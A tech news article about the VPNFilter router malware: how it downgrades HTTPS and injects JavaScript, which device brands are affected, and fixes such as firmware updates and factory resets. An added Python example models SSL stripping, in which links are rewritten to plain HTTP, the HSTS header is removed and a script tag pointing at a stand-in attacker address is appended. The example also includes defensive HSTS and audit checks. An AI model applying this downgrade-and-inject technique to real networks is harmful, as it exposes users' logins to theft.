Data-stealing router malware bypasses web encryption

It also inserts hostile code and targets devices on the network.

A recently discovered strain of router malware appears to be much worse than first thought. Cisco Talos has found that VPNFilter can not only render devices unusable, but can also defeat the HTTPS encryption that protects much of the web. It does this not by breaking the encryption itself but by downgrading it: a module in the malware sits in the router's traffic path and rewrites outgoing web requests so that connections are made over plain HTTP instead of HTTPS, letting it read sign-ins and other sensitive data whenever the downgrade succeeds. Because it already sits in the middle of the connection, the same man-in-the-middle position lets it inject hostile JavaScript into pages from outside websites, and the malware can target devices beyond the router itself, such as PCs on the local network.
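The following is an added example, not code from the article or from Cisco Talos, and it is a deliberately small model of the downgrade technique rather than a reproduction of the VPNFilter module. It shows three things in one place: how a router-resident man-in-the-middle can turn an HTTPS page into a plaintext one and slip a script tag in, how a browser's HSTS cache defeats that downgrade on the client side before the router ever sees the request, and two network-side checks (comparing the origin's response with what the LAN received, and flagging plaintext credential POSTs in a flow log). The host `bank.example`, the address `198.51.100.7`, the sample HTML and the log lines are all constructed for the example.

```python
import re

# Constructed sample response from an upstream HTTPS server (not real traffic).
UPSTREAM_RESPONSE = {
    "status": 200,
    "headers": {
        "Content-Type": "text/html",
        "Strict-Transport-Security": "max-age=31536000",
    },
    "body": '<html><body><a href="https://bank.example/login">Log in</a>'
            '<form action="https://bank.example/login" method="post">'
            '<input name="user"><input name="pass" type="password"></form>'
            '</body></html>',
}


def mitm_downgrade(resp, inject_src="http://198.51.100.7/x.js"):
    """Illustrative SSL-stripping rewrite by a man-in-the-middle on the router.
    Rewrites https:// references to http:// so the browser's next request is
    plaintext, drops the HSTS header so the browser never learns to insist on
    TLS, and appends a script tag (inject_src is a hypothetical attacker URL)."""
    headers = {k: v for k, v in resp["headers"].items()
               if k.lower() != "strict-transport-security"}
    body = resp["body"].replace("https://", "http://")
    body = body.replace("</body>", f'<script src="{inject_src}"></script></body>')
    return {"status": resp["status"], "headers": headers, "body": body}


class HstsClient:
    """Minimal model of a browser's HSTS cache: once a host has sent
    Strict-Transport-Security over a real HTTPS connection (or is preloaded),
    plaintext URLs for it are upgraded locally, before any router sees them."""

    def __init__(self, preload=()):
        self.known = set(preload)

    def learn(self, host, resp, over_tls):
        # HSTS must only be honoured when received over TLS, otherwise a
        # MITM could poison the cache with a bogus policy.
        if over_tls and "Strict-Transport-Security" in resp["headers"]:
            self.known.add(host)

    def effective_url(self, url):
        m = re.match(r"^(https?)://([^/]+)(/.*)?$", url)
        host, path = m.group(2), m.group(3) or "/"
        if host in self.known:
            return f"https://{host}{path}"
        return url


def audit_response(expected, observed):
    """Network-side checks: compare what the origin sent with what the client
    actually received (e.g. a WAN-side capture versus a LAN-side capture)."""
    findings = []
    if ("Strict-Transport-Security" in expected["headers"]
            and "Strict-Transport-Security" not in observed["headers"]):
        findings.append("hsts_header_removed")
    if expected["body"].count("https://") > observed["body"].count("https://"):
        findings.append("https_links_downgraded")
    script_re = r'<script[^>]+src="([^"]+)"'
    exp_scripts = set(re.findall(script_re, expected["body"]))
    obs_scripts = set(re.findall(script_re, observed["body"]))
    for src in sorted(obs_scripts - exp_scripts):
        findings.append(f"injected_script:{src}")
    return findings


def plaintext_credential_posts(log_lines):
    """Flag plaintext HTTP POSTs whose body carries password-like fields.
    Input: constructed flow-log lines of the form "METHOD URL BODY"."""
    hits = []
    for line in log_lines:
        method, url, body = line.split(" ", 2)
        if (method == "POST" and url.startswith("http://")
                and re.search(r"(^|&)(pass|password|pwd)=", body)):
            hits.append(url)
    return hits


if __name__ == "__main__":
    stripped = mitm_downgrade(UPSTREAM_RESPONSE)
    print("audit findings:", audit_response(UPSTREAM_RESPONSE, stripped))
    client = HstsClient()
    client.learn("bank.example", UPSTREAM_RESPONSE, over_tls=True)
    print("HSTS client will fetch:", client.effective_url("http://bank.example/login"))
    print("plaintext credential POSTs:", plaintext_credential_posts([
        "POST http://bank.example/login user=a&pass=b",
        "POST https://bank.example/login user=a&pass=b",
    ]))
```

The point of the `HstsClient` half is the practical caveat: a downgrade of this kind only works against a browser that has not yet learned the site's HSTS policy (or against sites that never send one), which is why the first visit to a site over an untrusted router is the dangerous one and why HSTS preloading matters. The two audit functions are the kind of check a network sensor or proxy log review can run; they assume you can see both sides of the router, which is not always the case.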

The rogue software targets many more devices than first thought, too. While a late May report focused on a handful of routers and network storage devices from Linksys, MikroTik, Netgear, QNAP and TP-Link, the malware is now known to affect both more models from those brands as well as devices from ASUS, D-Link, Huawei, Ubiquiti, Upvel and ZTE.

Significantly, VPNFilter isn't just infecting every device it can. Symantec noted that it's "particularly interested" in targets in Ukraine, suggesting that Russia or another politically motivated actor might be involved.

There are ways to minimize or eliminate the threat. MikroTik and Netgear note that newer firmware updates should protect against VPNFilter, and the FBI has seized a domain the malware used for its command and control system. QNAP has a malware removal tool. One caveat for anyone cleaning up: a reboot clears the later stages of the infection, but the first stage survives a reboot, so a firmware update or factory reset is needed to remove it fully. The scale of the threat is more than a little disconcerting, and many people and companies rarely upgrade their firmware. It's possible that a new variant could switch to a new domain and infect more devices with little resistance.